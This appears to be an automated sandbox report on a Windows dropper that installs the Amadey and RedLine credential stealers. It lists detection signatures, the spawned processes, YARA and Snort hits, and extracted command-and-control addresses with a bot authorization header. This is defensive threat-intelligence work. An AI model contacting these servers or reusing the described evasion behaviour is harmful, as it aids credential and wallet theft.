Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 803670
MD5: e46fc629e1740020f4cb10f793d38689
SHA1: b0bc2f9f5ad244c3c15160b389a66252adab9e0c
SHA256: f488772ca9291e830b797022be6c0c808e8963654276eb7c2c117279b41b69af
Tags: exe

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 4892 cmdline: C:\Users\user\Desktop\file.exe MD5: E46FC629E1740020F4CB10F793D38689)
    • fuN31PL.exe (PID: 1636 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe MD5: 1EA737E1D6A95AA35583293A9A2F5347)
      • fDI32WO.exe (PID: 5960 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe MD5: 156433A80D154CC7554D6D4E75C8E045)
        • aRe53.exe (PID: 5964 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
        • bAS06bx.exe (PID: 1256 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe MD5: EF8079CF160510D0DA7162BC08F753D8)
  • rundll32.exe (PID: 2244 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5308 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5928 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a1:$v2_1: ListOfProcesses
  • 0x13280:$v4_3: base64str
  • 0x13df9:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x12813:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Source | Rule | Description | Author | Strings
00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
Process Memory Space: bAS06bx.exe PID: 1256 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
2.3.fDI32WO.exe.45dfc20.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
2.3.fDI32WO.exe.45dfc20.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a1:$v2_1: ListOfProcesses
  • 0x13280:$v4_3: base64str
  • 0x13df9:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x12813:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
2.3.fDI32WO.exe.45dfc20.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
2.3.fDI32WO.exe.45dfc20.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x18840:$pat14: , CommandLine:
  • 0x118a1:$v2_1: ListOfProcesses
  • 0x11680:$v4_3: base64str
  • 0x121f9:$v4_4: stringKey
  • 0xff63:$v4_5: BytesToStringConverted
  • 0xf176:$v4_6: FromBase64
  • 0x10498:$v4_8: procName
  • 0x10c13:$v5_5: FileScanning
  • 0x1016c:$v5_7: RecordHeaderField
  • 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.file.exe.4ce3420.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp: 02/10/23-06:58:48.059056
SID: 2043234
Source IP: 193.233.20.11
Destination IP: 192.168.2.4
Source Port: 4131
Destination Port: 49696
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/10/23-06:58:59.386011
SID: 2043231
Source IP: 192.168.2.4
Destination IP: 193.233.20.11
Source Port: 49696
Destination Port: 4131
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/10/23-06:58:46.675190
SID: 2043233
Source IP: 192.168.2.4
Destination IP: 193.233.20.11
Source Port: 49696
Destination Port: 4131
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: file.exe | ReversingLabs: Detection: 69%
Source: file.exe | Virustotal: Detection: 58%
Source: file.exe | Avira: detected
Source: 193.233.20.11:4131 | Avira URL Cloud: Label: malware
Source: 193.233.20.11:4131 | Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe | Virustotal: Detection: 49%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | ReversingLabs: Detection: 96%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe | Joe Sandbox ML: detected
Source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
Source: 0.3.file.exe.4ce3420.0.unpack | Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00972F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00972F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | Code function: 1_2_001A2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_001A2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | Code function: 2_2_00A82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00A82F1D
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, dXL24Wx.exe.0.dr
Source: Binary string: wextract.pdbGCTL source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: fDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, aRe53.exe, 00000003.00000000.308600922.00000000005E2000.00000002.00000001.01000000.00000006.sdmp, aRe53.exe.2.dr
Source: Binary string: C:\setilikavegor\mixu76 bej yovesuwudel89 vifohe.pdb source: fuN31PL.exe, 00000001.00000003.307160395.0000000004794000.00000004.00000020.00020000.00000000.sdmp, cfh9400.exe.1.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00972390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00972390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | Code function: 1_2_001A2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_001A2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | Code function: 2_2_00A82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A82390

Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49696 -> 193.233.20.11:4131
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49696 -> 193.233.20.11:4131
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.11:4131 -> 192.168.2.4:49696
Source: Malware configuration extractor | URLs: 62.204.41.4/Gol478Ns/index.php
Source: Malware configuration extractor | URLs: 193.233.20.11:4131
Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View | IP Address: 193.233.20.11
Source: global traffic | TCP traffic: 192.168.2.4:49696 -> 193.233.20.11:4131
Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
